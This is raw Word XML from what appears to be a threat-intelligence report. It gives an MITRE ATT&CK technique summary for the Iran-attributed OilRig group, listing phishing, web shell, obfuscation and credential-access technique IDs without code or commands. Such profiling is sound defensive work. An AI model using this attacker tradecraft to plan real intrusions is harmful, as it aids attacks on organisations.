    <w:p w14:paraId="47C0F573" w14:textId="77777777" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>manage processes (create, kill and enumerate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50951C16" w14:textId="77777777" w:rsidR="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>manage services (create, start, stop, etc.); and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709CFBCE" w14:textId="036353A2" w:rsidR="00E32331" w:rsidRPr="00E32331" w:rsidRDefault="00E32331" w:rsidP="00E32331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>manage Windows registry entries, open a shell, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C85A1" w14:textId="0346BF01" w:rsidR="0051728E" w:rsidRDefault="0051728E" w:rsidP="004B5FA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C7D54" w14:textId="611272D4" w:rsidR="00063FEC" w:rsidRDefault="00063FEC" w:rsidP="00063FEC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc153480896"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00063FEC">
        <w:lastRenderedPageBreak/>
        <w:t>OilRig</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4210C6D9" w14:textId="77777777" w:rsidR="00063FEC" w:rsidRPr="005B4630" w:rsidRDefault="00063FEC" w:rsidP="00063FEC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc153480897"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="625E83FA" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="004374DD" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0049 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OilRig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9F9F1" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="004374DD" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Iran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F67083" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="004374DD" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is IR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274722E4"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F123B60"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297CB4B5"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.003', 'T1133', 'T1566.002', 'T1566.001', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D4DB6"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T1566.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> via Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550AFD4F"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r w:rsidRPr="007B58F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B58F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B58F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A49066"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41446495"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T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D38590"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B7D290"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1059.005', 'T1059.003', 'T1204.001', 'T1204.002', 'T1053.005', 'T1047', 'T1059.001', 'T1059']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F158B7F" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="00486034" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00486034">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00486034">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48954EEB"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230167A9"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F29384"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T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011EF9F"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2250DF"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8557FF"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8DC912"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1059 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4667A60F"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1137.004', 'T1053.005', 'T1133', 'T1078', 'T1505.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A6438"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T1137.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Office Application Startup&gt;:Outlook Home Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C378DB"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BC49FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC49FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D005276"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606837BB"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192EE9FC"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T1505.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D33559"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1053.005', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB27824"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B7CAA1"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E55C41"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1497.001', 'T1036', 'T1218.001', 'T1027', 'T1078', 'T1140', 'T1070.004', 'T1027.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7810F450"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T1497.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Virtualization/Sandbox Evasion&gt;:System Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D79A4F0"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1036 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB95909"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T1218.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Compiled HTML File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2799A3E9" w14:textId="77777777" w:rsidR="004374DD" w:rsidRPr="00F125AD" w:rsidRDefault="004374DD" w:rsidP="004374DD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F125AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F125AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F125AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31DC03"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD24C09"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r w:rsidRPr="007D3AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D3AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D3AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D3AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D3AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BBD328"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA06FDD"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T1027.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Indicator Removal from Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF02BF4"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004374DD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1555.004', 'T1555.003', 'T1555', 'T1003.005', 'T1003.004', 'T1552.001', 'T1110', 'T1056.001', 'T1003.001']</w:t>
      </w:r>
    </w:p>
